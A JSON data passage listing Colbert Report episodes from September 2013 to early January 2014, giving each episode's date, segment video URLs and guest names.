      ],
      "guest": "John Prine"
    },
    {
      "date": "2013-09-09",
      "videos": [
        "http://thecolbertreport.cc.com/videos/m0qnfl/egypt-s-stork-bust",
        "http://thecolbertreport.cc.com/videos/4zp755/syrian-conflict-action-plan",
        "http://thecolbertreport.cc.com/videos/jvhzt0/ronald-reagan-on-the-syrian-conflict",
        "http://thecolbertreport.cc.com/videos/a4utu0/tip-wag---iowa--bigger-pants---recent-articles",
        "http://thecolbertreport.cc.com/videos/f9cuxl/billie-jean-king",
        "http://thecolbertreport.cc.com/videos/2dw2cm/sign-off---spider-reagan"
      ],
      "guest": "Billie Jean King"
    },
    {
      "date": "2013-09-10",
      "videos": [
        "http://thecolbertreport.cc.com/videos/o8sjcq/colbert-s-book-club---j-d--salinger",
        "http://thecolbertreport.cc.com/videos/49qji6/colbert-s-book-club---better-know-a-salinger",
        "http://thecolbertreport.cc.com/videos/ueo7a2/colbert-s-book-club---tobias-wolff----the-catcher-in-the-rye-",
        "http://thecolbertreport.cc.com/videos/f2a6ao/colbert-s-book-club---shane-salerno-on-j-d--salinger",
        "http://thecolbertreport.cc.com/videos/2p7nwl/sign-off---colbert-s-book-club---j-d--salinger-s-glass-family"
      ],
      "guest": "Shane Salerno"
    },
    {
      "date": "2013-09-11",
      "videos": [
        "http://thecolbertreport.cc.com/videos/lop9g2/new-york-city-mayoral-primary",
        "http://thecolbertreport.cc.com/videos/pymjnx/america-s-got-serious-reservations-about-this---syria",
        "http://thecolbertreport.cc.com/videos/cta0kn/america-s-got-serious-reservations-about-this---syria---rand-paul",
        "http://thecolbertreport.cc.com/videos/w9ejb1/barack-obama-s-footgate---secret-muslim-code",
        "http://thecolbertreport.cc.com/videos/p83qs9/sheryl-crow"
      ],
      "guest": "Sheryl Crow"
    },
    {
      "date": "2013-09-12",
      "videos": [
        "http://thecolbertreport.cc.com/videos/r3zogj/vladimir-putin-s-op-ed-photos",
        "http://thecolbertreport.cc.com/videos/bujbay/better-know-a-district---washington-s-7th---jim-mcdermott",
        "http://thecolbertreport.cc.com/videos/7z7vfu/vladimir-putin-s-op-ed-on-u-s--intervention-in-syria",
        "http://thecolbertreport.cc.com/videos/cm16zd/philip-mudd",
        "http://thecolbertreport.cc.com/videos/4lw1cp/sign-off---goodnight"
      ],
      "guest": "Philip Mudd"
    },
    {
      "date": "2013-09-16",
      "videos": [
        "http://thecolbertreport.cc.com/videos/weeyn5/intro---9-16-13",
        "http://thecolbertreport.cc.com/videos/2lxvvp/lehman-brothers-anniversary---economic-recovery",
        "http://thecolbertreport.cc.com/videos/ggices/the-word---the-guilted-age",
        "http://thecolbertreport.cc.com/videos/vui8um/miss-america-2013",
        "http://thecolbertreport.cc.com/videos/v77k60/andrew-bacevich",
        "http://thecolbertreport.cc.com/videos/c31p0i/sign-off---financial-crisis-anniversary-cake"
      ],
      "guest": "Andrew Bacevich"
    },
    {
      "date": "2013-09-17",
      "videos": [
        "http://thecolbertreport.cc.com/videos/qkhrkt/intro---9-17-13",
        "http://thecolbertreport.cc.com/videos/hwlkz5/the-people-s-republic-of-obamastan---forbes-400-losers",
        "http://thecolbertreport.cc.com/videos/cgb0cw/colbert-platinum---luxury-ice---hot-dic-tip",
        "http://thecolbertreport.cc.com/videos/rkpujl/soul-rending-cheerios-ad",
        "http://thecolbertreport.cc.com/videos/2dwhox/arne-duncan",
        "http://thecolbertreport.cc.com/videos/ukxkfk/sign-off---goodnight"
      ],
      "guest": "Arne Duncan"
    },
    {
      "date": "2013-09-18",
      "videos": [
        "http://thecolbertreport.cc.com/videos/g7l8kk/syria-conflict---end-times-prophecy",
        "http://thecolbertreport.cc.com/videos/8pp3si/united-nations-on-syria-conflict---andrew-sullivan",
        "http://thecolbertreport.cc.com/videos/v0wk5h/navy-yard-shooting---gun-violence-causes",
        "http://thecolbertreport.cc.com/videos/ft7l84/nicholson-baker",
        "http://thecolbertreport.cc.com/videos/lpg81o/sign-off----damascus-countdown-"
      ],
      "guest": "Nicholson Baker"
    },
    {
      "date": "2013-09-19",
      "videos": [
        "http://thecolbertreport.cc.com/videos/1j1cxh/michelle-obama-s-h2o-campaign",
        "http://thecolbertreport.cc.com/videos/4iux0d/obamacare-government-shutdown",
        "http://thecolbertreport.cc.com/videos/6nrq55/obamacare-navigators",
        "http://thecolbertreport.cc.com/videos/7qwiwv/tip-wag---hammunition---george-clooney",
        "http://thecolbertreport.cc.com/videos/x5xw6g/jack-johnson"
      ],
      "guest": "Jack Johnson"
    },
    {
      "date": "2013-09-24",
      "videos": [
        "http://thecolbertreport.cc.com/videos/ecu59e/stephen-s-emmy-awards",
        "http://thecolbertreport.cc.com/videos/nsfkr7/on-notice---pope-francis",
        "http://thecolbertreport.cc.com/videos/vb7ms1/on-notice---pope-francis---jim-martin",
        "http://thecolbertreport.cc.com/videos/7xtam8/metallica",
        "http://thecolbertreport.cc.com/videos/g9dzis/sign-off---emmy-exhibition"
      ],
      "guest": "Metallica"
    },
    {
      "date": "2013-09-25",
      "videos": [
        "http://thecolbertreport.cc.com/videos/8fmvel/censorship-for-youtube-comments",
        "http://thecolbertreport.cc.com/videos/lsiidb/sport-report---cranium-coddlers---san-francisco-street-chess---floyd-mayweather",
        "http://thecolbertreport.cc.com/videos/ks6rd5/ted-cruz-s-obamacare--filibuster-",
        "http://thecolbertreport.cc.com/videos/urqr8j/joseph-gordon-levitt",
        "http://thecolbertreport.cc.com/videos/93nnw6/sign-off---ring-announcer"
      ],
      "guest": "Joseph Gordon-Levitt"
    },
    {
      "date": "2013-09-26",
      "videos": [
        "http://thecolbertreport.cc.com/videos/itk7kp/americone-dream-product-placement",
        "http://thecolbertreport.cc.com/videos/u1mo7v/chris-fischer",
        "http://thecolbertreport.cc.com/videos/lo2m3c/intro---9-26-13",
        "http://thecolbertreport.cc.com/videos/153u0a/sign-off---goodnight",
        "http://thecolbertreport.cc.com/videos/87ddew/time-travel-adventures-with-conservatives"
      ],
      "guest": "Chris Fischer"
    },
    {
      "date": "2013-09-30",
      "videos": [
        "http://thecolbertreport.cc.com/videos/mp715j/rockin--government-shutdown-eve",
        "http://thecolbertreport.cc.com/videos/pbvraa/tip-wag---butterball--ashley-merryman---science",
        "http://thecolbertreport.cc.com/videos/wzj7bh/vince-gilligan-pt--1",
        "http://thecolbertreport.cc.com/videos/xid9jc/vince-gilligan-pt--2"
      ],
      "guest": "Vince Gilligan"
    },
    {
      "date": "2013-10-01",
      "videos": [
        "http://thecolbertreport.cc.com/videos/99odk6/federal-government-shutdown",
        "http://thecolbertreport.cc.com/videos/cn352h/affordable-care-act---obama-s-computerized-america",
        "http://thecolbertreport.cc.com/videos/1ntmd2/adorable-care-act---generation-opportunity",
        "http://thecolbertreport.cc.com/videos/gfz4h7/national-hispanic-heritage-month",
        "http://thecolbertreport.cc.com/videos/obk0r1/daniel-radcliffe",
        "http://thecolbertreport.cc.com/videos/7ni2qs/sign-off---goodnight"
      ],
      "guest": "Daniel Radcliffe"
    },
    {
      "date": "2013-10-02",
      "videos": [
        "http://thecolbertreport.cc.com/videos/aykl9k/intro---10-2-13",
        "http://thecolbertreport.cc.com/videos/qx1ar9/1995-shutdown-survival-bunker",
        "http://thecolbertreport.cc.com/videos/qz6a9i/government--slimdown----potus-meeting",
        "http://thecolbertreport.cc.com/videos/xjdheq/blood-in-the-water---bill-o-reilly-s--killing-jesus-",
        "http://thecolbertreport.cc.com/videos/5ynb8q/chris-matthews",
        "http://thecolbertreport.cc.com/videos/mvs3wz/sign-off---shutdown-survival-bunker"
      ],
      "guest": "Chris Matthews"
    },
    {
      "date": "2013-10-03",
      "videos": [
        "http://thecolbertreport.cc.com/videos/7l0bys/government-shutdown-day-three",
        "http://thecolbertreport.cc.com/videos/amjasd/the-2013-government-shutdown-wedding-of-the-century-pt--1",
        "http://thecolbertreport.cc.com/videos/qt2vrd/david-finkel",
        "http://thecolbertreport.cc.com/videos/6as11u/sign-off---audra-mcdonald-s-availability"
      ],
      "guest": "David Finkel"
    },
    {
      "date": "2013-10-07",
      "videos": [
        "http://thecolbertreport.cc.com/videos/iyj9i2/government-shutdown-s-one-week-anniversary",
        "http://thecolbertreport.cc.com/videos/f9ohl9/bond-v--united-states",
        "http://thecolbertreport.cc.com/videos/rodf66/mccutcheon-v--fec---emily-bazelon",
        "http://thecolbertreport.cc.com/videos/d10tae/banksy-s-new-york-reign-of-terror",
        "http://thecolbertreport.cc.com/videos/feyjl3/james-spithill",
        "http://thecolbertreport.cc.com/videos/m7oe3o/sign-off----not-a-game--game"
      ],
      "guest": "James Spithill"
    },
    {
      "date": "2013-10-08",
      "videos": [
        "http://thecolbertreport.cc.com/videos/phldtj/intro---10-8-13",
        "http://thecolbertreport.cc.com/videos/u5kkik/debt-ceiling-deadline",
        "http://thecolbertreport.cc.com/videos/2b5rst/pro-pot-laws---pointers",
        "http://thecolbertreport.cc.com/videos/049124/thanksgiving-under-attack---hanukkah",
        "http://thecolbertreport.cc.com/videos/llhqmr/paul-giamatti",
        "http://thecolbertreport.cc.com/videos/tuzaza/sign-off----tj---dave-"
      ],
      "guest": "Paul Giamatti"
    },
    {
      "date": "2013-10-09",
      "videos": [
        "http://thecolbertreport.cc.com/videos/pjgp86/intro---10-9-13",
        "http://thecolbertreport.cc.com/videos/ssksja/ride-for-the-constitution",
        "http://thecolbertreport.cc.com/videos/h502rh/twitter-s-ipo",
        "http://thecolbertreport.cc.com/videos/k9g3h2/tom-emmer-s-controversial-ad",
        "http://thecolbertreport.cc.com/videos/ldxsu2/tom-hanks",
        "http://thecolbertreport.cc.com/videos/uevql0/sign-off---goodnight"
      ],
      "guest": "Tom Hanks"
    },
    {
      "date": "2013-10-10",
      "videos": [
        "http://thecolbertreport.cc.com/videos/xqbppa/government-shutdown-day-10---shep-smith-s-input",
        "http://thecolbertreport.cc.com/videos/bzo5fv/because-shep---fox-news-deck",
        "http://thecolbertreport.cc.com/videos/rt3php/because-shep---fox-news-deck---colbert-info-news-veranda",
        "http://thecolbertreport.cc.com/videos/r2mded/hanksy-s-grizzly-art",
        "http://thecolbertreport.cc.com/videos/twnvtr/reed-albergotti---vanessa-o-connell",
        "http://thecolbertreport.cc.com/videos/gn1hnb/sign-off---goodnight"
      ],
      "guest": "Reed Albergotti & Vanessa O'Connell"
    },
    {
      "date": "2013-10-21",
      "videos": [
        "http://thecolbertreport.cc.com/videos/zabrcj/end-of-the-government-shutdown",
        "http://thecolbertreport.cc.com/videos/fs5lvs/tip-wag---new-jersey--robo-teachers---amazon-erotica",
        "http://thecolbertreport.cc.com/videos/xmc07q/the-reflektors",
        "http://thecolbertreport.cc.com/videos/z30io4/sign-off----midnight"
      ],
      "guest": "The Reflektors"
    },
    {
      "date": "2013-10-22",
      "videos": [
        "http://thecolbertreport.cc.com/videos/0nhfjd/intro---10-22-13",
        "http://thecolbertreport.cc.com/videos/tpp3c7/the-in-box---lions-vs--tigers",
        "http://thecolbertreport.cc.com/videos/w4k85n/thought-for-food---kfc-s-go-cup---powerful-yogurt",
        "http://thecolbertreport.cc.com/videos/wv85sy/the-neiman-marcus-christmas-book",
        "http://thecolbertreport.cc.com/videos/413dai/a--scott-berg",
        "http://thecolbertreport.cc.com/videos/j9enbw/sign-off----the-heart-of-giving-"
      ],
      "guest": "A. Scott Berg"
    },
    {
      "date": "2013-10-23",
      "videos": [
        "http://thecolbertreport.cc.com/videos/pfan07/obamacare-website-gate",
        "http://thecolbertreport.cc.com/videos/51c17c/i-tried-to-sign-up-for-obamacare---health-care-house-of-horrors",
        "http://thecolbertreport.cc.com/videos/w07qf1/i-tried-to-sign-up-for-obamacare---health-care-navigators",
        "http://thecolbertreport.cc.com/videos/j95qfd/judy-woodruff---gwen-ifill",
        "http://thecolbertreport.cc.com/videos/rtpako/sign-off---goodnight"
      ],
      "guest": "Gwen Ifill, Judy Woodruff"
    },
    {
      "date": "2013-10-24",
      "videos": [
        "http://thecolbertreport.cc.com/videos/3cv3ae/intro---10-24-13",
        "http://thecolbertreport.cc.com/videos/8rabqj/girly-hats-for-the-marines",
        "http://thecolbertreport.cc.com/videos/6zcsyl/the-word---philantrophy",
        "http://thecolbertreport.cc.com/videos/60wsnw/craziest-f--king-thing-i-ve-ever-heard---tomtatoes",
        "http://thecolbertreport.cc.com/videos/9ak9w5/stephen-fry",
        "http://thecolbertreport.cc.com/videos/9py49q/sign-off---goodnight"
      ],
      "guest": "Stephen Fry"
    },
    {
      "date": "2013-10-28",
      "videos": [
        "http://thecolbertreport.cc.com/videos/xfzjxy/healthcare-gov-s-missing-woman",
        "http://thecolbertreport.cc.com/videos/0m56pa/germany-s-nsa-outrage",
        "http://thecolbertreport.cc.com/videos/7egvpg/germany-s-nsa-outrage---mark-mazzetti",
        "http://thecolbertreport.cc.com/videos/boarwv/lifetime-of-furfillment",
        "http://thecolbertreport.cc.com/videos/kz8x10/orlando-bloom",
        "http://thecolbertreport.cc.com/videos/fl658q/sign-off---goodnight"
      ],
      "guest": "Orlando Bloom"
    },
    {
      "date": "2013-10-29",
      "videos": [
        "http://thecolbertreport.cc.com/videos/dhae0b/intro---10-29-13",
        "http://thecolbertreport.cc.com/videos/qingaf/the-word---on-your-feet",
        "http://thecolbertreport.cc.com/videos/yxqllm/rand-paul-s-plagiarism-problem",
        "http://thecolbertreport.cc.com/videos/j9efvm/billy-collins",
        "http://thecolbertreport.cc.com/videos/fnaadw/sign-off----aimless-love-"
      ],
      "guest": "Billy Collins"
    },
    {
      "date": "2013-10-30",
      "videos": [
        "http://thecolbertreport.cc.com/videos/wibml9/intro---10-30-13",
        "http://thecolbertreport.cc.com/videos/me8aye/the-gop-s-self-disapproval",
        "http://thecolbertreport.cc.com/videos/jns4fj/threatdown---divorce--undocumented-network-jumpers---global-warming",
        "http://thecolbertreport.cc.com/videos/ammjdj/shepard-smith-s-digital-dependency",
        "http://thecolbertreport.cc.com/videos/7frodo/jack-andraka",
        "http://thecolbertreport.cc.com/videos/s14fzp/sign-off---goodnight"
      ],
      "guest": "Jack Andraka"
    },
    {
      "date": "2013-10-31",
      "videos": [
        "http://thecolbertreport.cc.com/videos/vr2jg3/intro---10-31-13",
        "http://thecolbertreport.cc.com/videos/8q3ppm/war-on-halloween---matt-lauer-s-costume",
        "http://thecolbertreport.cc.com/videos/2krnuz/blood-in-the-water---jim-wheeler-s-hypothetical-slavery-vote",
        "http://thecolbertreport.cc.com/videos/mzqttu/the-word---see-no-evil",
        "http://thecolbertreport.cc.com/videos/owduja/zach-sims",
        "http://thecolbertreport.cc.com/videos/53uet6/sign-off---the-glenlivet"
      ],
      "guest": "Zach Sims"
    },
    {
      "date": "2013-11-04",
      "videos": [
        "http://thecolbertreport.cc.com/videos/hfr88n/intro---11-4-13",
        "http://thecolbertreport.cc.com/videos/v68n7l/obamacare-s-gender-blind-premiums",
        "http://thecolbertreport.cc.com/videos/oi11jp/the-word---inc--god-we-trust",
        "http://thecolbertreport.cc.com/videos/29w6fx/-realhumanpraise-for-fox-news",
        "http://thecolbertreport.cc.com/videos/z1sht0/david-folkenflik",
        "http://thecolbertreport.cc.com/videos/vl9eiz/sign-off---goodnight"
      ],
      "guest": "David Folkenflik"
    },
    {
      "date": "2013-11-05",
      "videos": [
        "http://thecolbertreport.cc.com/videos/owoy1b/exclusive---julius-erving-extended-interview",
        "http://thecolbertreport.cc.com/videos/7bd2cq/rob-ford-s-crack-scandal",
        "http://thecolbertreport.cc.com/videos/s5iv9f/difference-makers---tim-morrison-and-meagan-brame",
        "http://thecolbertreport.cc.com/videos/6abc8c/gay-sex-in-the-insect-world",
        "http://thecolbertreport.cc.com/videos/9v56tr/julius-erving",
        "http://thecolbertreport.cc.com/videos/du2t8n/sign-off---crack-pipe"
      ],
      "guest": "Julius Erving"
    },
    {
      "date": "2013-11-06",
      "videos": [
        "http://thecolbertreport.cc.com/videos/rpo0ya/ms--marvel-s-reboot",
        "http://thecolbertreport.cc.com/videos/el55uc/tip-wag---toys--r--us--shroom-tombs---john-pike",
        "http://thecolbertreport.cc.com/videos/hdhamk/washington-state-s-gmo-labeling-initiative",
        "http://thecolbertreport.cc.com/videos/7nyym9/brian-lehrer",
        "http://thecolbertreport.cc.com/videos/snu1i2/sign-off---welcome-baby-fischel-"
      ],
      "guest": "Brian Lehrer"
    },
    {
      "date": "2013-11-07",
      "videos": [
        "http://thecolbertreport.cc.com/videos/d61yyh/employment-non-discrimination-act",
        "http://thecolbertreport.cc.com/videos/4cx9x8/sport-report---washington-redskins-name-controversy---miami-dolphins-bullying-allegations",
        "http://thecolbertreport.cc.com/videos/7cyanz/who-might-be-honoring-me-next----people-s-choice-awards",
        "http://thecolbertreport.cc.com/videos/80epmw/daniel-lieberman",
        "http://thecolbertreport.cc.com/videos/tx4mq5/sign-off---people-s-choice-awards"
      ],
      "guest": "Daniel Lieberman"
    },
    {
      "date": "2013-11-11",
      "videos": [
        "http://thecolbertreport.cc.com/videos/84rhzu/-60-minutes--benghazi-controversy",
        "http://thecolbertreport.cc.com/videos/uwudem/-60-minutes--benghazi-controversy---poncho-denews--bogus-bombshell",
        "http://thecolbertreport.cc.com/videos/bd4gnc/chris-christie-s-sunday-media-blitz",
        "http://thecolbertreport.cc.com/videos/2lqizl/peter-baker",
        "http://thecolbertreport.cc.com/videos/kglpif/sign-off---goodnight"
      ],
      "guest": "Peter Baker"
    },
    {
      "date": "2013-11-12",
      "videos": [
        "http://thecolbertreport.cc.com/videos/iitiue/intro---11-12-13",
        "http://thecolbertreport.cc.com/videos/pqrcpb/obamacare-enrollment-troubles",
        "http://thecolbertreport.cc.com/videos/s7e3qv/iran-nuke-negotiations---french-resistance",
        "http://thecolbertreport.cc.com/videos/0qvety/iran-nuke-negotiations---trita-parsi",
        "http://thecolbertreport.cc.com/videos/9s2qhn/shantytown-glamour-camping",
        "http://thecolbertreport.cc.com/videos/91wur1/david-christian",
        "http://thecolbertreport.cc.com/videos/61ms6y/sign-off----a-single-roll-of-the-dice-"
      ],
      "guest": "David Christian"
    },
    {
      "date": "2013-11-13",
      "videos": [
        "http://thecolbertreport.cc.com/videos/1p3who/u-s--drone-controversy",
        "http://thecolbertreport.cc.com/videos/h4v9zq/difference-makers---philip-steel",
        "http://thecolbertreport.cc.com/videos/w8qzgv/blood-in-the-water---richard-cohen-s-conventional-wisdom",
        "http://thecolbertreport.cc.com/videos/sn95d6/blind-boys-of-alabama---jimmy-carter"
      ],
      "guest": "Blind Boys of Alabama"
    },
    {
      "date": "2013-11-14",
      "videos": [
        "http://thecolbertreport.cc.com/videos/2o6sb0/philippines-typhoon-relief",
        "http://thecolbertreport.cc.com/videos/8olyhc/rob-ford-s-defiance",
        "http://thecolbertreport.cc.com/videos/wrbvsm/alexis-ohanian",
        "http://thecolbertreport.cc.com/videos/nmbdiq/sign-off---kitten-cuddle"
      ],
      "guest": "Alexis Ohanian"
    },
    {
      "date": "2013-11-18",
      "videos": [
        "http://thecolbertreport.cc.com/videos/yv49an/intro---11-18-13",
        "http://thecolbertreport.cc.com/videos/m7v6ee/philippines-relief-from-the-colbert-nation",
        "http://thecolbertreport.cc.com/videos/suwtn9/obamacare-backlash---pundit-hyperbole",
        "http://thecolbertreport.cc.com/videos/gnc6o8/obamacare-backlash---conservative-victory-lap",
        "http://thecolbertreport.cc.com/videos/12pe6a/alpha-dog-of-the-week---chip-wilson",
        "http://thecolbertreport.cc.com/videos/cdeggb/steve-mcqueen",
        "http://thecolbertreport.cc.com/videos/5ow82m/sign-off---goodnight"
      ],
      "guest": "Steve McQueen"
    },
    {
      "date": "2013-11-19",
      "videos": [
        "http://thecolbertreport.cc.com/videos/kzu5qm/walmart-s-employee-food-drive",
        "http://thecolbertreport.cc.com/videos/fkmwr4/america-s-wealth-divide",
        "http://thecolbertreport.cc.com/videos/nj0wp7/america-s-wealth-divide---robert-reich",
        "http://thecolbertreport.cc.com/videos/ppx1hm/slate-s--minutes-to-read--feature",
        "http://thecolbertreport.cc.com/videos/g1usdl/rick-santorum",
        "http://thecolbertreport.cc.com/videos/jnk6o6/sign-off---sweater-vest"
      ],
      "guest": "Rick Santorum"
    },
    {
      "date": "2013-11-20",
      "videos": [
        "http://thecolbertreport.cc.com/videos/kv4dxf/intro---11-20-13",
        "http://thecolbertreport.cc.com/videos/xxqfor/trey-radel-s-cocaine-arrest",
        "http://thecolbertreport.cc.com/videos/s2213y/tip-wag---hopped-up-pops--starbucks---american-consumers",
        "http://thecolbertreport.cc.com/videos/aiu6v1/sport-report---russia-s-anti-gay-winter-games",
        "http://thecolbertreport.cc.com/videos/bjap7z/m-i-a-"
      ],
      "guest": "M.I.A."
    },
    {
      "date": "2013-11-21",
      "videos": [
        "http://thecolbertreport.cc.com/videos/bz75lg/intro---11-21-13",
        "http://thecolbertreport.cc.com/videos/16t3na/nuclear-option-in-the-senate",
        "http://thecolbertreport.cc.com/videos/ynxkze/mary-fallin-and-same-sex-benefits",
        "http://thecolbertreport.cc.com/videos/pqqitw/guess-who-s-coming-to-thanksgiving-dinner-",
        "http://thecolbertreport.cc.com/videos/5idfv3/j-j--abrams",
        "http://thecolbertreport.cc.com/videos/1xi9cj/sign-off----s-"
      ],
      "guest": "J.J. Abrams"
    },
    {
      "date": "2013-12-02",
      "videos": [
        "http://thecolbertreport.cc.com/videos/a8rc4x/intro---12-2-13",
        "http://thecolbertreport.cc.com/videos/eax2go/healthcare-gov-revamp---presidential-turkey-pardon",
        "http://thecolbertreport.cc.com/videos/32fik6/amazon-s-delivery-drones",
        "http://thecolbertreport.cc.com/videos/kzzho9/blitzkrieg-on-grinchitude---bullet-catching-christmas-tree",
        "http://thecolbertreport.cc.com/videos/tllp9w/daniel-goleman",
        "http://thecolbertreport.cc.com/videos/4pjxs1/sign-off---eighth-anniversary-portrait"
      ],
      "guest": "Daniel Goleman"
    },
    {
      "date": "2013-12-03",
      "videos": [
        "http://thecolbertreport.cc.com/videos/810uks/intro---12-3-13",
        "http://thecolbertreport.cc.com/videos/6yqi5n/the-pope-s-secret-life",
        "http://thecolbertreport.cc.com/videos/ojh0t8/thought-for-food---ban-on-trans-fats---mcdonald-s-mcrib-mystery",
        "http://thecolbertreport.cc.com/videos/fepuu2/the-double-robotics-office-robot",
        "http://thecolbertreport.cc.com/videos/g14s8s/ed-stone",
        "http://thecolbertreport.cc.com/videos/jkirej/sign-off---honoring-ed-stone"
      ],
      "guest": "Ed Stone"
    },
    {
      "date": "2013-12-04",
      "videos": [
        "http://thecolbertreport.cc.com/videos/xzvt8w/do-nothing-congress",
        "http://thecolbertreport.cc.com/videos/vjdf7c/tip-wag---campaign-for-cursive---the-rnc",
        "http://thecolbertreport.cc.com/videos/y2lfd6/colbert-platinum---freedom-ship",
        "http://thecolbertreport.cc.com/videos/hzc351/bryan-stevenson",
        "http://thecolbertreport.cc.com/videos/eanv4b/sign-off"
      ],
      "guest": "Bryan Stevenson"
    },
    {
      "date": "2013-12-05",
      "videos": [
        "http://thecolbertreport.cc.com/videos/evhpy0/intro---12-5-13",
        "http://thecolbertreport.cc.com/videos/r2orue/the-in-box---flight-vs--invisibility",
        "http://thecolbertreport.cc.com/videos/t96lm4/legal-weed-in-colorado",
        "http://thecolbertreport.cc.com/videos/q1iez3/legal-weed-in-colorado---ricardo-baca",
        "http://thecolbertreport.cc.com/videos/zy6hlf/the-gop-s-lady-troubles",
        "http://thecolbertreport.cc.com/videos/blunby/alan-mulally",
        "http://thecolbertreport.cc.com/videos/xyy6ql/sign-off"
      ],
      "guest": "Allan Mulally"
    },
    {
      "date": "2013-12-09",
      "videos": [
        "http://thecolbertreport.cc.com/videos/8h6usc/remembering-nelson-mandela",
        "http://thecolbertreport.cc.com/videos/w58dfp/the-case-against-charity---bill-o-reilly---john-stossel",
        "http://thecolbertreport.cc.com/videos/5y4hrs/the-case-against-charity---homeless-for-the-holidays",
        "http://thecolbertreport.cc.com/videos/76e84o/stephen-s-grammy-nomination",
        "http://thecolbertreport.cc.com/videos/lv0hd2/david-keith",
        "http://thecolbertreport.cc.com/videos/6p2s11/sign-off"
      ],
      "guest": "David Keith"
    },
    {
      "date": "2013-12-10",
      "videos": [
        "http://thecolbertreport.cc.com/videos/my8zmp/intro---12-10-13",
        "http://thecolbertreport.cc.com/videos/7yd7o2/walmart-s-job-acceptance-rate",
        "http://thecolbertreport.cc.com/videos/z9zxq1/the-word---channel-serfing",
        "http://thecolbertreport.cc.com/videos/kaj6y2/blitzkrieg-on-grinchitude---early-christmas-in-venezuela",
        "http://thecolbertreport.cc.com/videos/pt29fq/alex-blumberg",
        "http://thecolbertreport.cc.com/videos/99z3wt/sign-off---farewell-to-frank-lesser"
      ],
      "guest": "Alex Blumberg"
    },
    {
      "date": "2013-12-11",
      "videos": [
        "http://thecolbertreport.cc.com/videos/zye2nw/blitzkrieg-on-grinchitude---festivus-pole-in-the-florida-capitol",
        "http://thecolbertreport.cc.com/videos/2vwk2a/obama-s-handshake-controversy",
        "http://thecolbertreport.cc.com/videos/ayrep6/sign-language-scandal-at-mandela-s-memorial",
        "http://thecolbertreport.cc.com/videos/jna07l/mike-huckabee-s--12-days-of-obamacare-",
        "http://thecolbertreport.cc.com/videos/ld1i97/elizabeth-gilbert",
        "http://thecolbertreport.cc.com/videos/nxssxf/sign-off---goodnight"
      ],
      "guest": "Elizabeth Gilbert"
    },
    {
      "date": "2013-12-12",
      "videos": [
        "http://thecolbertreport.cc.com/videos/juqc9w/bipartisan-budget-agreement",
        "http://thecolbertreport.cc.com/videos/ygi28a/cheating-death---sleep-health---cosmetic-surgery",
        "http://thecolbertreport.cc.com/videos/btidng/megyn-kelly-on-santa-s-skin-color",
        "http://thecolbertreport.cc.com/videos/gv6c5c/george-packer",
        "http://thecolbertreport.cc.com/videos/o3drqn/sign-off---goodnight"
      ],
      "guest": "George Packer"
    },
    {
      "date": "2013-12-16",
      "videos": [
        "http://thecolbertreport.cc.com/videos/tch93k/intro---12-16-13",
        "http://thecolbertreport.cc.com/videos/t0srep/google-s-robot-acquisition",
        "http://thecolbertreport.cc.com/videos/4q1rc7/nsa-video-game-surveillance",
        "http://thecolbertreport.cc.com/videos/qepegb/stephen-s-grammy-nomination---billy-crystal",
        "http://thecolbertreport.cc.com/videos/1wx2c5/jonah-peretti"
      ],
      "guest": "Jonah Peretti, Gregg Allman, the National"
    },
    {
      "date": "2013-12-17",
      "videos": [
        "http://thecolbertreport.cc.com/videos/ufkb4r/intro---12-17-13",
        "http://thecolbertreport.cc.com/videos/hdex9j/anti-nsa-ruling---edward-snowden-s-asylum-bid",
        "http://thecolbertreport.cc.com/videos/v7f6xw/tip-wag---all-china-edition",
        "http://thecolbertreport.cc.com/videos/18yj36/-ted-cruz-to-the-future-",
        "http://thecolbertreport.cc.com/videos/0hlwua/garry-trudeau"
      ],
      "guest": "Garry Trudeau, Cyndi Lauper, Alan Cumming"
    },
    {
      "date": "2013-12-18",
      "videos": [
        "http://thecolbertreport.cc.com/videos/uqgbw6/intro---12-18-13",
        "http://thecolbertreport.cc.com/videos/w20rkq/rethinking-customer-satisfaction",
        "http://thecolbertreport.cc.com/videos/hqucv3/santa-claus-ethnicity-debate",
        "http://thecolbertreport.cc.com/videos/7ick9v/santa-claus-ethnicity-debate---hans-beinholtz",
        "http://thecolbertreport.cc.com/videos/vv4aaz/keanu-reeves",
        "http://thecolbertreport.cc.com/videos/52csyt/sign-off---goodnight"
      ],
      "guest": "Keanu Reeves, Aaron Neville"
    },
    {
      "date": "2013-12-19",
      "videos": [
        "http://thecolbertreport.cc.com/videos/rdc6qs/jamie-dimon-s-christmas-card",
        "http://thecolbertreport.cc.com/videos/p9rfx1/fox-news-s--12-scams-of-christmas-",
        "http://thecolbertreport.cc.com/videos/na7pll/phil-robertson-s--duck-dynasty--suspension",
        "http://thecolbertreport.cc.com/videos/3q7h60/ben-stiller"
      ],
      "guest": "Ben Stiller, the Blind Boys of Alabama"
    }
  ],
  "2014": [
    {
      "date": "2014-01-06",
      "videos": [
        "http://thecolbertreport.cc.com/videos/qaqhv8/intro---1-6-14",
        "http://thecolbertreport.cc.com/videos/vobbe1/polar-vortex",
        "http://thecolbertreport.cc.com/videos/3goywo/tip-wag---fda--toy-manufacturers---logo-party",
        "http://thecolbertreport.cc.com/videos/hyg1jb/recreational-pot-sales-in-colorado",
        "http://thecolbertreport.cc.com/videos/5qceid/ken-roth",
        "http://thecolbertreport.cc.com/videos/f9w0xq/sign-off---polar-vortex"
      ],
      "guest": "Kenneth Roth"
    },
    {
      "date": "2014-01-07",
      "videos": [
        "http://thecolbertreport.cc.com/videos/4uqurx/donald-trump-and-fox---friends-vs--global-warming",
        "http://thecolbertreport.cc.com/videos/s9iccj/income-inequality-debate",
        "http://thecolbertreport.cc.com/videos/v3sijl/income-inequality-debate---jim-martin",
        "http://thecolbertreport.cc.com/videos/b9gbou/time-travel-research-in-cyberspace",
        "http://thecolbertreport.cc.com/videos/bz0qvj/john-seigenthaler",
        "http://thecolbertreport.cc.com/videos/a4c8i8/sign-off----a-big-heart-open-to-god-"
      ],
      "guest": "John Seigenthaler"
    },
    {
      "date": "2014-01-08",
      "videos": [
        "http://thecolbertreport.cc.com/videos/1vojc6/intro---1-8-14",
        "http://thecolbertreport.cc.com/videos/2zkpvh/chris-christie---the-george-washington-bridge-scandal",
        "http://thecolbertreport.cc.com/videos/bkjqeq/cheating-death---robo-sperm---health-roulette",
        "http://thecolbertreport.cc.com/videos/ct0fks/the-polar-vortex---fruit-tools",
        "http://thecolbertreport.cc.com/videos/i292oo/ishmael-beah",
        "http://thecolbertreport.cc.com/videos/srasr6/sign-off---cold-weather-fruit-hammer"
      ],
      "guest": "Ishmael Beah"
    },
    {
      "date": "2014-01-09",
      "videos": [
